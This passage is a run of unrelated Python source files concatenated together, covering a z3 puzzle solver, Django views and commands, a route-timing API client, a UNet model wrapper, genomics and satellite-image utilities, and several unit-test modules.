0,n-1) country, grunge, reggae, speed_metal = genre rendevouz = makeIntArrayVector(sol,"rendevouz",n, 0,n-1) carnival_games, information_booth, mosh_pit, T_shirt_vendor = rendevouz # constraints sol.add(Distinct([genre[i] for i in range(n)])) sol.add(Distinct([rendevouz[i] for i in range(n)])) # 1. Korrupt isn't a country or grunge music band. sol.add(Korrupt != country,Korrupt != grunge) # 2. Tim and Kerri won't meet at the carnival games during Ellyfish's # performance. sol.add(Ellyfish != carnival_games) # 3. 
The pair won't meet at the T-shirt vendor during the reggae # band's show. sol.add(reggae != T_shirt_vendor) # 4. Exactly two of the following three statements are true: # a) Ellyfish plays grunge music. # b) Tim and Kerri won't meet at the information booth during a # performance by Retread Ed and the Flat Tires. # c) The two friends won't meet at the T-shirt vendor while # Yellow Reef is playing. sol.add( If(Ellyfish == grunge,1,0) + If(information_booth != Retread_Ed_and_the_Flat_Tires,1,0) + If(T_shirt_vendor != Yellow_Reef,1,0) == 2) # 5. The country and speed metal acts are, in some order, Retread Ed # and the Flat Tires and the act during which Tim and Kerri will # meet at the mosh pit. sol.add(Or( And( country == Retread_Ed_and_the_Flat_Tires, speed_metal == mosh_pit ) , And( speed_metal == Retread_Ed_and_the_Flat_Tires, country == mosh_pit ) )) # 6. The reggae band is neither Korrupt nor the act during which Tim and # Kerri will meet at the information booth. sol.add(reggae != Korrupt) sol.add(reggae != information_booth) num_solutions = 0 while sol.check() == sat: num_solutions += 1 mod = sol.model() print("rockband :", [rockband[i] for i in range(n)]) print("genre :", [mod.eval(genre[i]) for i in range(n)]) print("rendevouz:", [mod.eval(rendevouz[i]) for i in range(n)]) print() getDifferentSolution(sol,mod,list(genre), list(rendevouz)) print("num_solutions:", num_solutions) dwillis/django-calaccess-processed-data #!/usr/bin/env python # -*- coding: utf-8 -*- """ Load the OCD Candidacy model with data extracted from the Form501Filing model. """ from __future__ import unicode_literals from django.core.management.base import CommandError from opencivicdata.elections.models import CandidateContest from calaccess_processed.management.commands import CalAccessCommand from calaccess_processed.models import Form501Filing, OCDCandidacyProxy class Command(CalAccessCommand): """ Load the OCD Candidacy model with data extracted from the Form501Filing model. """ help = 'Load the OCD Candidacy model with data extracted from the Form501Filing model' def handle(self, *args, **options): """ Make it happen. """ super(Command, self).handle(*args, **options) if not CandidateContest.objects.exists(): error_message = 'No contests currently loaded (run loadocdcandidatecontests).' if self._called_from_command_line: self.failure(error_message) else: raise CommandError(error_message) else: self.header("Loading additional candidacies from Form 501 filings") for form501 in Form501Filing.objects.without_candidacy(): if self.verbosity > 2: self.log(' Processing Form 501: %s' % form501.filing_id) # Get a linked contest contest = form501.get_contest() # If there is no contest, quit. if not contest: return None candidacy, created = OCDCandidacyProxy.objects.get_or_create_from_calaccess( contest, form501.parsed_name, candidate_filer_id=form501.filer_id ) if created and self.verbosity > 2: tmp = ' Created new Candidacy: {0.candidate_name} in {0.post.label}' self.log(tmp.format(candidacy)) candidacy.link_form501(form501) candidacy.update_from_form501(form501) self.success("Done!") from django.shortcuts import render, HttpResponse # Create your views here. 
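# Illustrative sketch only (not part of the original module), assuming a
# hypothetical template at 'plan/plan_course.html': the same kind of view
# written with the render() shortcut imported above instead of a bare
# HttpResponse.
def plan_course_rendered(request):
    # render() loads the named template, fills it with the context dict,
    # and returns the result wrapped in an HttpResponse.
    return render(request, 'plan/plan_course.html', {'title': 'Plan Course'})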
def plan_course(request): return HttpResponse("PLAN COURSE")from django.http import Http404 from django.views.generic import ListView, DetailView from django.shortcuts import render, get_object_or_404 from carts.models import Cart from .models import Greenery class GreeneryFeaturedListView(ListView): template_name = "greenery/list.html" def get_queryset(self, *args, **kwargs): request = self.request return Greenery.objects.all().featured() class GreeneryFeaturedDetailView(DetailView): queryset = Greenery.objects.all().featured() template_name = "greenery/featured-detail.html" # def get_queryset(self, *args, **kwargs): # request = self.request # return Greenery.objects.featured() class GreeneryListView(ListView): template_name = "greenery/list.html" def get_queryset(self, *args, **kwargs ): request = self.request return Greenery.objects.all() def greenery_list_view(request): queryset = Greenery.objects.all() context = { 'object_list': queryset } return render(request, "greenery/list.html", context) class GreeneryDetailSlugView(DetailView): queryset = Greenery.objects.all() template_name = "greenery/detail.html" def get_context_data(self, *args, **kwargs): context = super(GreeneryDetailSlugView, self).get_context_data(*args, **kwargs) cart_obj, new_obj = Cart.objects.new_or_get(self.request) context['cart'] = cart_obj return context def get_object(self, *args, **kwargs): request = self.request slug = self.kwargs.get('slug') #instance = get_object_or_404(Greenery, slug=slug, active=True) try: instance = Greenery.objects.get(slug=slug, active=True) except Greenery.DoesNotExist: raise Http404("You Lost Homie..") except Greenery.MultipleObjectsReturned: qs = Greenery.objects.filter(slug=slug, active=True) instance = qs.first() except: raise Http404("Sad Face how you get here ") return instance class GreeneryDetailView(DetailView): template_name = "greenery/detail.html" def get_context_data(self, *args, **kwargs): context = super(GreeneryDetailView, self).get_context_data(*args, **kwargs) print(context) return context def get_object(self, *args, **kwargs): request = self.request pk = self.kwargs.get('pk') instance = Greenery.objects.get_by_id(pk) if instance is None: raise Http404("We ain't got it bruh!") return instance def greenery_detail_view(request, pk=None, *args, **kwargs): instance = Greenery.objects.get_by_id(pk) if instance is None: raise Http404("We ain't got it bruh!") # qs = Greenery.objects.filter(id=pk) # #print(qs) # if qs.exists() and qs.count() == 1: # len(qs) # instance = qs.first() # else: # raise Http404("Aint Got What You Looking For Bruh!") context = { 'object': instance } return render(request, "greenery/list.html", context) import requests import json import datetime import pytz from traffic.secrets._apikey import API_KEY BASE_API_URL = "https://maps.googleapis.com/maps/api/directions" def getOptimalRouteTime(dt, origin, destination, model="pessimistic"): # google API depature time works from seconds since midnight 01/01/1970 UTC time depature_time_secs = int((dt-datetime.datetime(1970, 1, 1, 0, 0, tzinfo=pytz.timezone('UTC'))).total_seconds()) departure_time = "{0}".format(depature_time_secs) api_url = "{0}/json?origin={1}&destination={2}&departure_time={3}&traffic_model={4}&key={5}".format(BASE_API_URL, origin, destination, departure_time, model, API_KEY ) r = requests.get(api_url) data = r.json() # get the minimum time for all routes time_in_secs = float("inf") for r in data['routes']: route_time_in_secs = 0 for l in r['legs']: route_time_in_secs += 
l['duration_in_traffic']['value'] time_in_secs = min(route_time_in_secs, time_in_secs) return time_in_secs def create_new_employee_department(): employee_department = [] emp = ' ' while emp != ' ': emp_department_input = input('Enter employee last name \n') employee_department.append(emp_department_input) return employee_department """ SoftLayer.CLI.routes ~~~~~~~~~~~~~~~~~~~ Routes for shell-specific commands :license: MIT, see LICENSE for more details. """ ALL_ROUTES = [ ('exit', 'SoftLayer.shell.cmd_exit:cli'), ('shell-help', 'SoftLayer.shell.cmd_help:cli'), ('env', 'SoftLayer.shell.cmd_env:cli'), ] ALL_ALIASES = { '?': 'shell-help', 'help': 'shell-help', 'quit': 'exit', } import torch import torch.nn as nn import segmentation_models_pytorch as smp import torchvision import torchvision.transforms.functional as TVF import PIL class ImageNetPreprocess(nn.Module): def __init__(self, device, encoder_architecture="resnet18"): super().__init__() params = smp.encoders.get_preprocessing_params(encoder_architecture, "imagenet") self.normalize = torchvision.transforms.Normalize(mean=params["mean"], std=params["std"]) def forward(self, x): return self.normalize(x) class UNet(nn.Module): """A simple UNet wrapper that handles ImageNet normalization in-network""" def __init__(self, imagenet_pretrained: bool, encoder_architecture, input_shape, device, auto_resize_in: bool, auto_resize_out: bool): super().__init__() self.imagenet_pretrained = imagenet_pretrained self.input_shape = input_shape self.auto_resize_in = auto_resize_in self.auto_resize_out = auto_resize_out encoder_weights = "imagenet" if imagenet_pretrained else None self.underlying = smp.Unet(encoder_architecture, encoder_weights=encoder_weights, in_channels=3, activation='sigmoid').to(device) self.preprocess = ImageNetPreprocess(device, encoder_architecture).to(device) def forward(self, x): assert x.ndim == 4, f"Illegal input shape {x.shape}. Expected (B,C,H,W) shape." original_shape = x.shape[2:] if self.auto_resize_in and original_shape != self.input_shape: x = TVF.resize(x, self.input_shape, PIL.Image.NEAREST) if x.dtype == torch.uint8: x = x / 255.0 if self.imagenet_pretrained: x = self.preprocess(x) y = self.underlying(x) if self.auto_resize_out: y = TVF.resize(y, original_shape, PIL.Image.NEAREST) y = torch.squeeze(y, dim=1) return y david-a-parry/muvermuver/allelic_fraction.py from collections import defaultdict import re import numpy import csv from wrappers.samtools import mpileup_iter def get_allelic_fractions(bam_file, ref_fn, output_file): ''' Read over a BAM file, output an allele fraction histogram. 
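Only pileup positions with more than 20 counted alleles contribute to the histogram. Allele fractions are binned from 0 to 1 in 0.01-wide bins and written to output_file as a tab-delimited table with 'Bin start' and 'Count' columns.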
''' allele_fractions = [] for line in mpileup_iter(bam_file, ref_fn): allele_counts = defaultdict(int) line_split = line.strip().split() reference_allele, coverage = line_split[2:4] if int(coverage) > 0: bases = line_split[4] else: bases = '' i = 0 while i < len(bases): if re.match('[.,]', bases[i]): allele_counts[reference_allele] += 1 elif re.match('[ACGTacgt]', bases[i]): allele_counts[bases[i].upper()] += 1 elif re.match('[+-]', bases[i]): indel_type = bases[i] i += 1 indel_length = int(bases[i]) i += 1 indel = indel_type + bases[i:i+indel_length].upper() allele_counts[indel] += 1 i += indel_length elif bases[i] == '^': i += 1 elif bases[i] == '*': allele_counts[bases[i]] += 1 i += 1 _sum = sum(allele_counts.values()) if _sum > 20: for value in allele_counts.values(): allele_fractions.append(float(value) / _sum) bins = [(0.01 * i) for i in range(101)] histogram = numpy.histogram(allele_fractions, bins=bins, density=False) with open(output_file, 'w') as OUT: fieldnames = ['Bin start', 'Count'] writer = csv.DictWriter(OUT, fieldnames=fieldnames, delimiter='\t') writer.writeheader() for value, bin_start in zip(histogram[0], histogram[1]): writer.writerow({ 'Bin start': str(bin_start), 'Count': str(value), }) tests/test_satimg.py """ Test functions for SatelliteImage class """ import os import sys import pytest import datetime as dt import numpy as np import geoutils.georaster as gr import geoutils.satimg as si from geoutils import datasets import geoutils from io import StringIO import numpy as np DO_PLOT = False class TestSatelliteImage: def test_init(self): """ Test that inputs work properly in SatelliteImage class init """ fn_img = datasets.get_path("landsat_B4") # from filename, checking option img = si.SatelliteImage(fn_img, read_from_fn=False) img = si.SatelliteImage(fn_img) assert isinstance(img,si.SatelliteImage) # from SatelliteImage img2 = si.SatelliteImage(img) assert isinstance(img2,si.SatelliteImage) # from Raster r = gr.Raster(fn_img) img3 = si.SatelliteImage(r) assert isinstance(img3,si.SatelliteImage) assert np.logical_and.reduce((np.array_equal(img.data, img2.data, equal_nan=True), np.array_equal(img2.data, img3.data, equal_nan=True))) assert np.logical_and.reduce((np.all(img.data.mask == img2.data.mask), np.all(img2.data.mask == img3.data.mask))) def test_silent(self): """ Test that the silent method does not return any output in console """ fn_img = datasets.get_path("landsat_B4") # let's capture stdout # cf https://stackoverflow.com/questions/16571150/how-to-capture-stdout-output-from-a-python-function-call class Capturing(list): def __enter__(self): self._stdout = sys.stdout sys.stdout = self._stringio = StringIO() return self def __exit__(self, *args): self.extend(self._stringio.getvalue().splitlines()) del self._stringio # free up some memory sys.stdout = self._stdout with Capturing() as output1: img = si.SatelliteImage(fn_img) # check the metadata reading outputs to console assert len(output1)>0 with Capturing() as output2: img = si.SatelliteImage(fn_img,silent=True) # check nothing outputs to console assert len(output2)==0 def test_copy(self): """ Test that the copy method works as expected for SatelliteImage. 
In particular when copying r to r2: - if r.data is modified and r copied, the updated data is copied - if r is copied, r.data changed, r2.data should be unchanged """ # Open dataset, update data and make a copy r = si.SatelliteImage(datasets.get_path("landsat_B4")) r.data += 5 r2 = r.copy() # Objects should be different (not pointing to the same memory) assert r is not r2 # Check the object is a SatelliteImage assert isinstance(r2, geoutils.satimg.SatelliteImage) # check all immutable attributes are equal # georaster_attrs = ['bounds', 'count', 'crs', 'dtypes', 'height', 'indexes', 'nodata', # 'res', 'shape', 'transform', 'width'] # satimg_attrs = ['satellite', 'sensor', 'product', 'version', 'tile_name', 'datetime'] # using list directly available in Class attrs = [at for at in gr.default_attrs if at not in ['name', 'dataset_mask', 'driver']] all_attrs = attrs + si.satimg_attrs for attr in all_attrs: assert r.__getattribute__(attr) == r2.__getattribute__(attr) # Check data array assert np.array_equal(r.data, r2.data, equal_nan=True) # Check dataset_mask array assert np.all(r.data.mask == r2.data.mask) # Check that if r.data is modified, it does not affect r2.data r.data += 5 assert not np.array_equal(r.data, r2.data, equal_nan=True) def test_filename_parsing(self): copied_names = ['TDM1_DEM__30_N00E104_DEM.tif', 'SETSM_WV02_20141026_1030010037D17F00_10300100380B4000_mosaic5_2m_v3.0_dem.tif', 'AST_L1A_00303132015224418_final.tif', 'ILAKS1B_20190928_271_Gilkey-DEM.tif', 'srtm_06_01.tif', 'ASTGTM2_N00E108_dem.tif', 'N00E015.hgt', 'NASADEM_HGT_n00e041.hgt'] # Corresponding data, filled manually satellites = ['TanDEM-X', 'WorldView', 'Terra', 'IceBridge', 'SRTM', 'Terra', 'SRTM', 'SRTM'] sensors = ['TanDEM-X', 'WV02', 'ASTER', 'UAF-LS', 'SRTM', 'ASTER', 'SRTM', 'SRTM'] products = ['TDM1', 'ArcticDEM/REMA', 'L1A', 'ILAKS1B', 'SRTMv4.1', 'ASTGTM2', 'SRTMGL1', 'NASADEM-HGT'] # we can skip the version, bit subjective... 
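# Expected tile identifiers (None where the filename encodes no tile) and
# acquisition datetimes for the filenames listed above; note that every
# SRTM-derived entry resolves to the same fixed date in February 2000.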
tiles = ['N00E104', None, None, None, '06_01', 'N00E108', 'N00E015', 'n00e041'] datetimes = [None, dt.datetime(year=2014,month=10,day=26),dt.datetime(year=2015,month=3,day=13,hour=22,minute=44,second=18), dt.datetime(year=2019,month=9,day=28),dt.datetime(year=2000,month=2,day=15),None,dt.datetime(year=2000,month=2,day=15), dt.datetime(year=2000,month=2,day=15)] for names in copied_names: attrs = si.parse_metadata_from_fn(names) i = copied_names.index(names) assert satellites[i] == attrs[0] assert sensors[i] == attrs[1] assert products[i] == attrs[2] assert tiles[i] == attrs[4] assert datetimes[i] == attrs[5] def test_sw_tile_naming_parsing(self): #normal examples test_tiles = ['N14W065','S14E065','N014W065','W065N014','W065N14','N00E000'] test_latlon = [(14,-65),(-14,65),(14,-65),(14,-65),(14,-65),(0,0)] for tile in test_tiles: assert si.sw_naming_to_latlon(tile)[0] == test_latlon[test_tiles.index(tile)][0] assert si.sw_naming_to_latlon(tile)[1] == test_latlon[test_tiles.index(tile)][1] for latlon in test_latlon: assert si.latlon_to_sw_naming(latlon) == test_tiles[test_latlon.index(latlon)] # check possible exceptions, rounded lat/lon belong to their southwest border assert si.latlon_to_sw_naming((0, 0)) == 'N00E000' # those are the same point, should give same naming assert si.latlon_to_sw_naming((-90, 0)) == 'S90E000' assert si.latlon_to_sw_naming((90, 0)) == 'S90E000' # same here assert si.latlon_to_sw_naming((0, -180)) == 'N00W180' assert si.latlon_to_sw_naming((0, 180)) == 'N00W180'""" Base classes and utilities for working with hangouts settings """ from hangout_api.exceptions import NoSuchDeviceFound from hangout_api.utils import silence_contextmanager, names_cleaner, TIMEOUTS from retrying import retry class BaseSettings(object): # pylint: disable=R0903 """ Base class that handling device setting """ device_class = NotImplementedError def __init__(self, base): self.base = base def get_devices(self, with_nodes=False): """ Return devices list """ raise NotImplementedError() @retry(stop_max_attempt_number=3) def _devices_getter( self, device_xpath, devices_list_xpath, with_nodes): """ Returns list of the devices based on device_xpath and devices_list_xpath arguments. Because HG is build all DOM dynamically there is need to make some actions before list of devices appear in DOM, this method handles it and also parses list values. """ self.base.navigate_to_devices_settings() # click on MC list to make it load list of all devices device_box = self.base.browser.xpath(device_xpath).parent with silence_contextmanager(device_box): if device_box.by_class('c-h-i-b-o', timeout=TIMEOUTS.immediately): # if this class present that means that there is no devices # available to change device_name = device_box.get_attribute( 'innerText').split('\n')[0].strip() # in case if there is no devices at all return empty list if ' found' in device_name: return [] return [self.device_class(names_cleaner(device_name))] device_box.click(timeout=TIMEOUTS.fast) # get list of devices devices = { names_cleaner(n.get_attribute('innerText')): n for n in self.base.browser.xpath(devices_list_xpath, eager=True)} if with_nodes: return devices # pylint: disable=bad-builtin return list(map(self.device_class, devices.keys())) @retry(stop_max_attempt_number=3) def _device_setter(self, device_name): """ Devices setter that can handle special cases when only 1 device is available or no devices at all. 
In case if device can not be set raise NoSuchDeviceFound exception """ if isinstance(device_name, self.device_class): device_name = device_name.name devices = self.get_devices(with_nodes=True) if len(devices) == 1: # there is no sense to set devise # if no devices or only one device are available return # pylint: disable=bad-builtin if device_name not in devices: raise NoSuchDeviceFound( "Can't find device with name '%s'" % device_name) self.get_devices(with_nodes=True)[device_name].click() self.base.click_on_devices_save_button() @retry(stop_max_attempt_number=3) def _current_device_getter(self, text_selector, parrenty=2): """ Returns currently used device """ self.base.navigate_to_devices_settings() base_element = self.base.browser.by_text(text_selector) for _ in range(parrenty): base_element = base_element.parent device_name = names_cleaner( base_element.get_attribute('innerText').split('\n')[0]) return self.device_class(device_name) class MutingHandler(object): """ Handler to interact with mute buttons, like "Mute Video". """ # pylint: disable=R0913 def __init__(self, base, base_text, mute_label, unmute_label, no_device): self.base = base self.base_text = base_text self.mute_label = mute_label self.unmute_label = unmute_label self.xpath = '//div[contains(@aria-label, "%s")]' % self.base_text self.no_device_xpath = '//div[contains(@aria-label, "%s")]' % no_device @retry(stop_max_attempt_number=3) def get_mute_button_label(self): """ Returns current text of 'mute' button. In case if muting is not available (no device found) raises NoSuchDeviceFound """ self.base.click_cancel_button_if_there_is_one() with silence_contextmanager(self.base.browser): mute_button = self.base.browser.xpath(self.xpath) if mute_button is None: with silence_contextmanager(self.base.browser): no_device = self.base.browser.xpath( self.no_device_xpath, timeout=TIMEOUTS.fast) if no_device: raise NoSuchDeviceFound('No device found') # raising original exception self.base.browser.xpath(self.xpath, timeout=TIMEOUTS.fast) return mute_button.get_attribute('aria-label') @retry(stop_max_attempt_number=3) def is_muted(self): """ Returns True if muted otherwise False """ return self.get_mute_button_label() == self.unmute_label @retry(stop_max_attempt_number=3) def mute(self): """ Mutes device """ if self.get_mute_button_label() == self.unmute_label: return False self.base.click_menu_element(self.xpath) return True @retry(stop_max_attempt_number=3) def unmute(self): """ Un-mutes device """ if self.get_mute_button_label() == self.mute_label: return False self.base.click_menu_element(self.xpath) return True #!/usr/bin/env python2 # -*- coding: utf-8 -*- """ Created on Thu Feb 6 11:11:12 2020 @author: liubing """ import argparse import numpy as np import sys import pickle from sklearn.ensemble import RandomForestClassifier from sklearn.metrics import accuracy_score sys.path.insert(0, "lib") from gcforest.gcforest import GCForest from gcforest.utils.config_utils import load_json import h5py def get_label(gc, train_images): num = len(train_images)/1000 y = np.zeros(1) for i in range(num): temp = gc.predict(train_images[i*1000:(i+1)*1000,:]) y = np.concatenate((y,temp)) temp = gc.predict(train_images[num*1000:,:]) y = np.concatenate((y,temp)) return y[1:] def parse_args(): parser = argparse.ArgumentParser() parser.add_argument("--model", dest="model", type=str, default=None, help="gcfoest Net Model File") args = parser.parse_args() return args if __name__ == "__main__": args = parse_args() config=load_json('IP.json') gc = 
GCForest(config) # If the model you use cost too much memory for you. # You can use these methods to force gcforest not keeping model in memory # gc.set_keep_model_in_mem(False), default is TRUE. f=h5py.File('IP28-28-27.h5','r') train_images=f['data'][:] train_labels=f['label'][:] f.close() #f=open('paviaU.data','rb') #train_images=pickle.load(f) #train_labels=pickle.load(f) #f.close() train_labels = np.argmax(train_labels,1) indices = np.arange(train_images.shape[0]) shuffled_indices = np.random.permutation(indices) images = train_images[shuffled_indices] labels = train_labels[shuffled_indices] n_classes = labels.max() + 1 i_labeled = [] for c in range(n_classes): i = indices[labels==c][:5]##change sample number i_labeled += list(i) X_train = images[i_labeled] X_train = X_train.reshape(-1,27,28,28) y_train = labels[i_labeled] #y_train = np.argmax(y_train,1) #train_labels = np.argmax(train_labels,1) X_train_enc = gc.fit_transform(X_train, y_train) # X_enc is the concatenated predict_proba result of each estimators of the last layer of the GCForest model # X_enc.shape = # (n_datas, n_estimators * n_classes): If cascade is provided # (n_datas, n_estimators * n_classes, dimX, dimY): If only finegrained part is provided # You can also pass X_test, y_test to fit_transform method, then the accracy on test data will be logged when training. # X_train_enc, X_test_enc = gc.fit_transform(X_train, y_train, X_test=X_test, y_test=y_test) # WARNING: if you set gc.set_keep_model_in_mem(True), you would have to use # gc.fit_transform(X_train, y_train, X_test=X_test, y_test=y_test) to evaluate your model. train_images = train_images.reshape(-1,27,28,28) y_pred = get_label(gc, train_images) acc = accuracy_score(train_labels, y_pred) print(acc) 1-10 # Copyright 2018 Recruit Communications Co., Ltd. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. 
import unittest from pyqubo import PlaceholderProd class TestPlaceholderProd(unittest.TestCase): def test_equality(self): term_key1 = PlaceholderProd({"a": 1, "b": 2}) term_key2 = PlaceholderProd({"a": 1, "b": 2}) term_key3 = PlaceholderProd({"a": 2, "b": 1}) self.assertTrue(term_key1 == term_key2) self.assertTrue(term_key1 != term_key3) self.assertTrue(term_key1 != 1) def test_equality_const(self): term_key1 = PlaceholderProd({}) term_key2 = PlaceholderProd({}) term_key3 = PlaceholderProd({'a': 1}) self.assertTrue(term_key1.is_constant()) self.assertEqual(term_key1, term_key2) self.assertNotEqual(term_key1, term_key3) def test_merge(self): term_key1 = PlaceholderProd({"a": 1, "b": 2}) term_key2 = PlaceholderProd({"a": 1, "b": 1}) term_key3 = PlaceholderProd({"a": 2, "b": 3}) term_key4 = PlaceholderProd({}) self.assertEqual(term_key3, PlaceholderProd.merge_term_key(term_key1, term_key2)) self.assertEqual(term_key1, PlaceholderProd.merge_term_key(term_key1, term_key4)) def test_evaluate(self): term_key1 = PlaceholderProd({"a": 1, "b": 2}) empty_key = PlaceholderProd({}) dict_value = {"a": 3.0, "b": 5.0} prod = term_key1.calc_product(dict_value) expected_prod = 75 self.assertEqual(expected_prod, prod) self.assertEqual(1, empty_key.calc_product({})) def test_repr(self): term_key1 = PlaceholderProd({"a": 2, "b": 3}) empty_key = PlaceholderProd({}) self.assertIn(repr(term_key1), "a^2*b^3") self.assertEqual(repr(empty_key), "const") 10-100 import functools import os import subprocess import time import unittest from test import support support.requires('audio') winsound = support.import_module('winsound') def sound_func(func): @functools.wraps(func) def wrapper(*args, **kwargs): try: ret = func(*args, **kwargs) except RuntimeError as e: if support.verbose: print(func.__name__, 'failed:', e) else: if support.verbose: print(func.__name__, 'returned') return ret return wrapper safe_Beep = sound_func(winsound.Beep) safe_MessageBeep = sound_func(winsound.MessageBeep) safe_PlaySound = sound_func(winsound.PlaySound) class BeepTest(unittest.TestCase): def test_errors(self): self.assertRaises(TypeError, winsound.Beep) self.assertRaises(ValueError, winsound.Beep, 36, 75) self.assertRaises(ValueError, winsound.Beep, 32768, 75) def test_extremes(self): safe_Beep(37, 75) safe_Beep(32767, 75) def test_increasingfrequency(self): for i in range(100, 2000, 100): safe_Beep(i, 75) def test_keyword_args(self): safe_Beep(duration=75, frequency=2000) class MessageBeepTest(unittest.TestCase): def tearDown(self): time.sleep(0.5) def test_default(self): self.assertRaises(TypeError, winsound.MessageBeep, 'bad') self.assertRaises(TypeError, winsound.MessageBeep, 42, 42) safe_MessageBeep() def test_ok(self): safe_MessageBeep(winsound.MB_OK) def test_asterisk(self): safe_MessageBeep(winsound.MB_ICONASTERISK) def test_exclamation(self): safe_MessageBeep(winsound.MB_ICONEXCLAMATION) def test_hand(self): safe_MessageBeep(winsound.MB_ICONHAND) def test_question(self): safe_MessageBeep(winsound.MB_ICONQUESTION) def test_keyword_args(self): safe_MessageBeep(type=winsound.MB_OK) class PlaySoundTest(unittest.TestCase): def test_errors(self): self.assertRaises(TypeError, winsound.PlaySound) self.assertRaises(TypeError, winsound.PlaySound, 'bad', 'bad') self.assertRaises(RuntimeError, winsound.PlaySound, 'none', winsound.SND_ASYNC | winsound.SND_MEMORY) self.assertRaises(TypeError, winsound.PlaySound, b'bad', 0) self.assertRaises(TypeError, winsound.PlaySound, 'bad', winsound. 
SND_MEMORY) self.assertRaises(TypeError, winsound.PlaySound, 1, 0) def test_keyword_args(self): safe_PlaySound(flags=winsound.SND_ALIAS, sound='SystemExit') def test_snd_memory(self): with open(support.findfile('pluck-pcm8.wav', subdir='audiodata'), 'rb' ) as f: audio_data = f.read() safe_PlaySound(audio_data, winsound.SND_MEMORY) audio_data = bytearray(audio_data) safe_PlaySound(audio_data, winsound.SND_MEMORY) def test_snd_filename(self): fn = support.findfile('pluck-pcm8.wav', subdir='audiodata') safe_PlaySound(fn, winsound.SND_FILENAME | winsound.SND_NODEFAULT) def test_aliases(self): aliases = ['SystemAsterisk', 'SystemExclamation', 'SystemExit', 'SystemHand', 'SystemQuestion'] for alias in aliases: with self.subTest(alias=alias): safe_PlaySound(alias, winsound.SND_ALIAS) def test_alias_fallback(self): safe_PlaySound('!"$%&/(#+*', winsound.SND_ALIAS) def test_alias_nofallback(self): safe_PlaySound('!"$%&/(#+*', winsound.SND_ALIAS | winsound. SND_NODEFAULT) def test_stopasync(self): safe_PlaySound('SystemQuestion', winsound.SND_ALIAS | winsound. SND_ASYNC | winsound.SND_LOOP) time.sleep(0.5) safe_PlaySound('SystemQuestion', winsound.SND_ALIAS | winsound. SND_NOSTOP) winsound.PlaySound(None, winsound.SND_PURGE) if __name__ == '__main__': unittest.main() # !/usr/bin/env python # -*- coding: utf-8 -*- # # Filename: database.py # Project: helpers # Author: # Created: Sunday, 18th October 2020 11:54:01 am # License: BSD 3-clause "New" or "Revised" License # Copyright (c) 2020 # Last Modified: Sunday, 18th October 2020 11:54:01 am # Modified By: from __future__ import print_function, division, absolute_import import importlib import inspect from types import ModuleType from typing import List, Union, Type import sdssdb.peewee import sdssdb.sqlalchemy from sdssdb.connection import DatabaseConnection, PeeweeDatabaseConnection, SQLADatabaseConnection from sdss_brain.exceptions import BrainError db_type = Union[Type[PeeweeDatabaseConnection], Type[SQLADatabaseConnection], Type[sdssdb.peewee.BaseModel], Type[sdssdb.sqlalchemy.BaseModel], Type[ModuleType]] class DatabaseHandler(object): """ Convenience class for handling an sdssdb database connection / ORM A convenience class to provide a simple API to any sdssdb database or ORM. Accepts as input any sdssdb peewee or sqlalchemy ORM Model, DatabaseConnection, or a sdssdb schema ORM python module. Given valid input will determine, which database, schema, set of ORMs, and primary ORM. Parameters ---------- db_input : db_type The type of sdssdb database input. 
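For example, a peewee or sqlalchemy ORM class, an established ``DatabaseConnection``, or an imported schema module such as ``sdssdb.peewee.sdss5db.targetdb`` would each be accepted (module path given for illustration).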
Attributes ---------- orm : str Indicates whether the ORM is peewee or sqlalchemy model : `~sdssdb.peewee.BaseModel` | `~sdssdb.sqlalchemy.BaseModel` Any database ORM Model models : py module A database schema python module containing all ORM models db : `~sdssdb.connection.DatabaseConnection` A database connection object schema : str The schema name session : `~sqlalchemy.orm.session.Session` A sqlalchemy database session needed for querying """ def __init__(self, db_input: db_type = None) -> None: self.orm = None self.model = None self.models = None self._session = None self.db = None self.schema = None self._determine_input(db_input) def __repr__(self) -> str: d = {'orm': self.orm, 'model': self.model.__name__ if self.model else None, 'schema': self.schema, 'db': self.db.dbname if self.db else None} repr_items = ', '.join([m for m in map(lambda x: '{0}="{1}"'.format( *x) if x[1] else '', d.items()) if m]) return f'' def _determine_input(self, value: db_type = None) -> None: """ Determine the type of database input Determines whether the input is a valid sdssdb ORM Model, DatabaseConnection, or schema module, and sets the instance attributes for orm, db, schema, model and models. Parameters ---------- value : db_type, optional The type of ``sdssdb`` database input, by default None """ if not value: return if any(self._is_a_model(value)): self._check_models(value) elif any(self._is_a_db(value)): self._check_dbs(value) elif any(self._is_a_schema(value)): self._check_schema(value) @staticmethod def _is_a_model(value: db_type) -> List[bool]: """ Conditional check if input is an ORM Model """ if not inspect.isclass(value): return [None, None] pmodel, smodel = issubclass(value, sdssdb.peewee.BaseModel), issubclass( value, sdssdb.sqlalchemy.BaseModel) return [pmodel, smodel] def _check_models(self, value: db_type) -> None: """ Checks a sdssdb ORM Given any sdssdb peewee or sqlalchemy ORM, extracts relevant information on the ORM, database, schema name, and set of ORM models. Parameters ---------- value : `~sdssdb.peewee.BaseModel` | `~sdssdb.sqlalchemy.BaseModel` A valid sdssdb peewee or sqla ORM """ pmodel, smodel = self._is_a_model(value) self.model = value self.models = importlib.import_module(value.__module__) if pmodel: self.orm = 'peewee' self.schema = value._meta.schema self.db = value._meta.database elif smodel: self.orm = 'sqla' self.schema = value._schema self.db = getattr(self.models, 'database', None) self._set_session() @staticmethod def _is_a_db(value: db_type) -> List[bool]: """ Conditional check if input is a DatabaseConnection """ pdatabase, sdatabase = isinstance(value, PeeweeDatabaseConnection), isinstance( value, SQLADatabaseConnection) return [pdatabase, sdatabase] def _check_dbs(self, value: Type[DatabaseConnection]) -> None: """ Checks a sdssdb database connection Given a sdssdb peewee or sqlalchemy database connection, extracts relevant information on the ORM, database, schema name, and set of ORM models. 
